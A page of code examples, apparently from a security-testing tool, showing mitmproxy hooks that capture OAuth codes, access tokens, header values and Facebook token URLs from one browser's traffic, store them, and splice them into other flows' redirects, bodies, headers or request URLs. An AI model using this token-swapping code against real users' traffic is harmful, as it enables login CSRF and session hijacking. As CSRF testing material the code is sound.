Beispiel #1
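 def csrf_substitude_code_in_location(self, target,
                                      flow: mitmproxy.http.HTTPFlow):
     """Capture or swap the ``target`` value carried in a ``Location`` header.

     Nothing happens unless the response has a ``Location`` header that
     contains ``target``. When it does, the request decides the role:

     * The request carries the ``self.browserID`` marker header (capture
       side): the value is extracted from the Location header, written to
       ``self.RAM + target``, and the flow is killed.
     * Any other request (replay side): the first line stored in
       ``self.RAM + target`` is read back and substituted into the
       Location header of this response.

     Args:
         target: Substring that marks the value of interest. Presumably a
             query-parameter prefix such as ``code=``; confirm with callers.
         flow: The mitmproxy flow whose response is being inspected.

     Returns:
         True when the Location header contained ``target`` and one of the
         two branches ran, False otherwise.

     Raises:
         OSError: On the replay side, if no value has been stored yet.
         IndexError: On the replay side, if the stored file is empty.
     """
     response_headers = flow.response.headers
     # Test membership on the Headers mapping itself rather than on .keys().
     # mitmproxy documents header lookups as case-insensitive, while .keys()
     # yields names as they were sent, so a "Location" spelling would be
     # missed. TODO confirm against the pinned mitmproxy version.
     if "location" not in response_headers:
         return False

     location = response_headers["location"]
     if target not in location:
         return False

     self.logger.write_info("csrf on key value in location header")
     self.logger.write_info("[location]: " + location)
     store_path = self.RAM + target

     if self.browserID in flow.request.headers:
         key_value = extract_code_from_content(location, target)
         # NOTE(review): the captured value is presumably a live
         # authorization code or token. It is logged verbatim here and then
         # persisted, so the log and the store directory need the same
         # access restrictions and cleanup as any other credential store.
         self.logger.write_info("[target] " + target + " " + key_value)
         self.logger.write_file(store_path, key_value)
         self.logger.write_info("Successfully save key value to " +
                                store_path)
         flow.kill()
         self.logger.write_info("kill flow")
     else:
         self.logger.write_info(
             "[ORIGIN " + target + "] " +
             extract_code_from_content(location, target))
         # Read-only access is enough here. The line terminator is stripped
         # so that a newline can never end up inside the rewritten header.
         with open(store_path, 'r') as f:
             key_value = f.readlines()[0].rstrip("\r\n")
         self.logger.write_info("[CHANGE " + target + "] " + key_value)
         response_headers["location"] = substitute_code(
             location, target, key_value)
         self.logger.write_info("If succeed? " + str(
             key_value in response_headers["location"]))
     return True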
Beispiel #2
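 def csrf_substitude_code_in_text(self, target,
                                  flow: mitmproxy.http.HTTPFlow):
     """Capture or swap the ``target`` value found in the response body text.

     Nothing happens unless the decoded response body contains ``target``.
     When it does, the request decides the role:

     * The request carries the ``self.browserID`` marker header (capture
       side): the value is extracted from the body, written to
       ``self.RAM + target``, and the flow is killed.
     * Any other request (replay side): the first line stored in
       ``self.RAM + target`` is read back and handed to
       ``substitute_access_token_in_text`` together with the flow.

     Args:
         target: Substring that marks the value of interest in the body.
         flow: The mitmproxy flow whose response is being inspected.

     Returns:
         True when the body contained ``target`` and one of the two
         branches ran, False otherwise, including when the response has no
         decodable text.

     Raises:
         OSError: On the replay side, if no value has been stored yet.
         IndexError: On the replay side, if the stored file is empty.
     """
     body_text = flow.response.text
     # ``text`` can be None when there is no body to decode; the original
     # ``target in None`` would raise TypeError instead of reporting a miss.
     if body_text is None or target not in body_text:
         return False

     self.logger.write_info("csrf on value in response text")
     store_path = self.RAM + target

     if self.browserID in flow.request.headers:
         key_value = extract_code_from_content(body_text, target)
         # NOTE(review): the captured value is presumably a live token. It
         # is logged verbatim here and then persisted, so the log and the
         # store directory should be protected and purged like credentials.
         self.logger.write_info("[target] " + target + " " + key_value)
         self.logger.write_file(store_path, key_value)
         self.logger.write_info("Successfully save key value to " +
                                store_path)
         flow.kill()
         self.logger.write_info("kill flow")
     else:
         self.logger.write_info(
             "[ORIGIN " + target + "] " +
             extract_code_from_content(body_text, target))
         # Read-only access is enough; strip the line terminator so that it
         # is not spliced into the response body along with the value.
         with open(store_path, 'r') as f:
             key_value = f.readlines()[0].rstrip("\r\n")
         self.logger.write_info("[CHANGE " + target + "] " + key_value)
         substitute_access_token_in_text(flow, target, key_value)
         # Re-read the body from the flow: the helper receives the flow and
         # is expected to have rewritten it.
         self.logger.write_info("If succeed? " +
                                str(key_value in flow.response.text))
     return True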
Beispiel #3
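 def csrf_substitude_header(self, target, flow: mitmproxy.http.HTTPFlow):
     """Capture or replace the whole value of the response header ``target``.

     Nothing happens unless the response has a header named ``target``.
     When it does, the request decides the role:

     * The request carries the ``self.browserID`` marker header (capture
       side): the header value is written to ``self.RAM + target`` and the
       flow is killed.
     * Any other request (replay side): the first line stored in
       ``self.RAM + target`` replaces the header value on this response.

     Args:
         target: Name of the response header to capture or overwrite.
         flow: The mitmproxy flow whose response is being inspected.

     Returns:
         None in every case.
         NOTE(review): the sibling ``csrf_substitude_code_in_*`` methods
         return True/False; confirm whether callers expect the same here.

     Raises:
         OSError: On the replay side, if no value has been stored yet.
         IndexError: On the replay side, if the stored file is empty.
     """
     response_headers = flow.response.headers
     # Test membership on the Headers mapping itself rather than on .keys().
     # mitmproxy documents header lookups as case-insensitive, while .keys()
     # yields names as they were sent. TODO confirm against the pinned
     # mitmproxy version.
     if target not in response_headers:
         return

     self.logger.write_info("csrf change a whole header value")
     value = response_headers[target]
     store_path = self.RAM + target

     if self.browserID in flow.request.headers:
         key_value = value
         # NOTE(review): depending on ``target`` this may be a session
         # cookie or token. It is logged verbatim and persisted, so the log
         # and the store directory should be handled as sensitive.
         self.logger.write_info("[target] " + target + " " + key_value)
         self.logger.write_file(store_path, key_value)
         self.logger.write_info("Successfully save key value to " +
                                store_path)
         flow.kill()
         self.logger.write_info("kill flow")
     else:
         self.logger.write_info("[ORIGIN " + target + "] " + value)
         # Read-only access is enough. The line terminator is stripped so
         # that a newline can never end up inside the header value.
         with open(store_path, 'r') as f:
             key_value = f.readlines()[0].rstrip("\r\n")
         self.logger.write_info("[CHANGE " + target + "] " + key_value)
         response_headers[target] = key_value
         self.logger.write_info("If succeed? " + str(
             key_value in response_headers[target]))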
Beispiel #4
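def request(flow: mitmproxy.http.HTTPFlow):
    """
        The full HTTP request has been read.

        Three things happen, in order:

        1. If ``checker.check_host`` and ``checker.check_TLS`` both accept
           the flow, its URL is logged with a ``[TLS]`` prefix.
        2. Requests whose host contains ``test.xxx`` are killed.
        3. Requests whose URL contains ``fb_access_token=`` are captured or
           rewritten. A request carrying the ``longming`` header has its
           full URL stored in ``RAM/access_token`` and is killed. Any other
           request has its URL replaced by the first line of the first
           file found in ``RAM/``.

        Note that the module-level ``access_token`` holds a complete URL,
        not a bare token value.
    """
    global access_token

    if checker.check_host(flow) and checker.check_TLS(flow):
        logger.write(log_file, "[TLS] " + flow.request.pretty_url)

    # NOTE(review): processing continues after this kill, so a killed flow
    # can still reach the capture/replay logic below. Confirm that this is
    # intended.
    if "test.xxx" in flow.request.host:
        flow.kill()

    # csrf
    target = "fb_access_token="
    if target not in flow.request.pretty_url:
        return

    # Mapping membership instead of .keys(): mitmproxy documents header
    # lookups as case-insensitive. TODO confirm against the pinned version.
    if "longming" in flow.request.headers:
        # access_token = csrf.extract_code(flow, target)
        access_token = flow.request.pretty_url
        # NOTE(review): the URL embeds a live access token. It is logged
        # verbatim and persisted under RAM/, so both the log file and that
        # directory must be access-restricted and purged after the test run.
        logger.write_info(log_file, "[TOKEN] " + access_token)
        # Explicit check instead of ``assert``, which is removed under -O.
        if not access_token:
            raise AssertionError("captured URL is empty")
        logger.write_file("RAM/access_token", access_token)
        flow.kill()
    else:
        # NOTE(review): this wait has no timeout and sleeps inside the
        # hook. If hooks are dispatched serially, the capturing request can
        # never be processed while this loop runs. Confirm the threading
        # model, or bound the wait.
        stored_names = os.listdir('RAM')
        while not stored_names:
            time.sleep(1)
            stored_names = os.listdir('RAM')
        logger.write_info(
            log_file, "[ORIGIN TOKEN] " + csrf.extract_code(flow, target))
        # NOTE(review): os.listdir order is unspecified, so any stray file
        # in RAM/ may be picked up here instead of RAM/access_token.
        # Read-only access is enough; the line terminator is stripped so
        # that it cannot become part of the rewritten request URL.
        with open('RAM/' + stored_names[0], 'r') as f:
            access_token = f.readlines()[0].rstrip("\r\n")
        logger.write_info(log_file, "[CHANGE TOKEN] " + access_token)
        if not access_token:
            raise AssertionError("stored URL is empty")
        # assert csrf.csrf_request(flow, target, access_token)
        flow.request.url = access_token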